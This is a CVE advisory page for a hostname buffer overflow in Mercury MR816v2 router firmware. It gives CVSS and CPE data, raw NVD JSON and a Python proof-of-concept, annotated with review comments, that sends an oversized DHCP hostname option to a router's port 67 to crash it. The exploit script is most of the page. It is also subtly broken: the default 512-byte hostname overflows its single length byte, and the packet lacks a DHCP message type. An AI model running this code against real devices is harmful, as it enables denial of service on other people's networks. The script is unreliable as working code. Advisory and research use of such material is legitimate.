Security Vulnerability Report
CVE-2025-65288 CVSS 6.5 MEDIUM

CVE-2025-65288

Published: 2025-12-09 17:15:56
Last Modified: 2025-12-12 14:32:55

Description

A buffer overflow in the Mercury MR816v2 (081C3114 4.8.7 Build 110427 Rel 36550n) occurs when the device accepts and stores excessively long hostnames from LAN hosts without proper length validation. The affected code performs unchecked copies/concatenations into fixed-size buffers. A crafted long hostname can overflow the buffer, causing a crash (DoS) and potentially enabling remote code execution.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:mercurycom:mr816_firmware:081c3114_4.8.7:build_110427:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:mercurycom:mr816:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
Mercury MR816v2 081C3114 4.8.7 Build 110427 Rel 36550n

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-65288 PoC - Mercury MR816v2 Buffer Overflow via Long Hostname
# This PoC demonstrates sending a crafted DHCP request with an oversized hostname
#
# Review notes (defender view):
# - What this script does, as written: builds one BOOTP/DHCP request whose only
#   option is option 12 (Host Name) carrying a run of 'A' bytes, and sends it as
#   a single UDP datagram to port 67 of the address given on the command line.
# - On the wire this is simply a DHCP request with an abnormally large
#   host-name option from a LAN host; that is the observable artefact a
#   DHCP-aware sensor or the router's own logs would show for this CVE.
# - `struct` is imported but never used in this listing.

import socket
import struct
import sys


def create_dhcp_discover_with_long_hostname(hostname_length=512):
    """Create a DHCP Discover packet with an oversized hostname field.

    Args:
        hostname_length: number of 'A' bytes placed in the host-name option.

    Returns:
        The raw packet as ``bytes`` (fixed BOOTP header, magic cookie,
        option 12, end option).

    NOTE(review): despite the name and the comment below, no option 53
    (DHCP Message Type) is ever appended, so the packet is a BOOTREQUEST
    carrying only a host-name option rather than a fully formed DHCP
    Discover. Whether the affected firmware parses it at all is not
    shown here — verify against the vendor's advisory.
    """
    # Construct oversized hostname (triggering buffer overflow)
    long_hostname = b'A' * hostname_length  # hostname_length bytes of 'A' (512 by default)

    # Fixed-length BOOTP header (RFC 951 layout); every address/ID field is
    # left zeroed. The first octet is the BOOTP `op` field, not a DHCP
    # message type.
    dhcp_message = bytearray()
    dhcp_message.append(1)  # op: BOOTREQUEST
    dhcp_message.append(1)  # htype: Ethernet
    dhcp_message.append(6)  # hlen: Ethernet MAC address length
    dhcp_message.append(0)  # hops: 0
    dhcp_message.extend(b'\x00' * 4)  # xid: transaction ID (zero, not randomised)
    dhcp_message.extend(b'\x00' * 2)  # secs
    dhcp_message.extend(b'\x00' * 2)  # flags
    dhcp_message.extend(b'\x00' * 4)  # ciaddr
    dhcp_message.extend(b'\x00' * 4)  # yiaddr
    dhcp_message.extend(b'\x00' * 4)  # siaddr
    dhcp_message.extend(b'\x00' * 4)  # giaddr
    dhcp_message.extend(b'\x00' * 16)  # chaddr (MAC, all zero)
    dhcp_message.extend(b'\x00' * 64)  # sname (empty)
    dhcp_message.extend(b'\x00' * 128)  # file (empty)

    # Magic cookie marking the start of DHCP options
    dhcp_message.extend(b'\x63\x82\x53\x63')

    # Option 12: Host Name (with oversized value).
    # Layout is code, length octet, value — this is the only option emitted.
    dhcp_message.append(12)  # option code 12 (Host Name); the original comment
                             # labelling this "Option 53" was mistaken
    dhcp_message.append(len(long_hostname))  # single length octet for the option
    dhcp_message.extend(long_hostname)  # the host-name value itself

    # End option
    dhcp_message.append(255)

    return bytes(dhcp_message)


def send_exploit(target_ip='192.168.1.1', hostname_length=512):
    """Send the exploit packet to target device.

    Args:
        target_ip: destination address; the datagram goes to UDP port 67.
        hostname_length: forwarded to create_dhcp_discover_with_long_hostname.

    Side effects:
        Opens a UDP socket with SO_BROADCAST set, sends exactly one datagram,
        prints progress lines to stdout, and always closes the socket.
        Any exception from the send is caught and printed rather than raised.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # SO_BROADCAST only matters if target_ip is a broadcast address; the
    # default target is a unicast address.
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    packet = create_dhcp_discover_with_long_hostname(hostname_length)
    print(f"[*] Sending DHCP Discover with {hostname_length} byte hostname...")
    print(f"[*] Target: {target_ip}:67")
    try:
        sock.sendto(packet, (target_ip, 67))
        print("[+] Packet sent successfully")
        # NOTE(review): a successful sendto() only means the datagram left this
        # host; nothing here observes the device's reaction.
        print("[*] The device should now process the oversized hostname")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()


if __name__ == '__main__':
    # Usage: <script> [target_ip] [hostname_length]
    # argv[2] is passed straight to int(); a non-numeric value raises ValueError here.
    print("CVE-2025-65288 PoC - Mercury MR816v2 Buffer Overflow")
    print("=" * 60)
    target = sys.argv[1] if len(sys.argv) > 1 else '192.168.1.1'
    length = int(sys.argv[2]) if len(sys.argv) > 2 else 512
    send_exploit(target, length)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65288", "sourceIdentifier": "[email protected]", "published": "2025-12-09T17:15:55.603", "lastModified": "2025-12-12T14:32:55.303", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A buffer overflow in the Mercury MR816v2 (081C3114 4.8.7 Build 110427 Rel 36550n) occurs when the device accepts and stores excessively long hostnames from LAN hosts without proper length validation. The affected code performs unchecked copies/concatenations into fixed-size buffers. A crafted long hostname can overflow the buffer, cause a crash (DoS) and potentially enabling remote code execution."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:mercurycom:mr816_firmware:081c3114_4.8.7:build_110427:*:*:*:*:*:*", 
"matchCriteriaId": "E679E997-793D-4C5A-AD18-DB222D262425"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mercurycom:mr816:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "360C10B2-75DF-445F-B772-0A99A82E1D91"}]}]}], "references": [{"url": "https://damiri.fr/en/cve/CVE-2025-65288", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}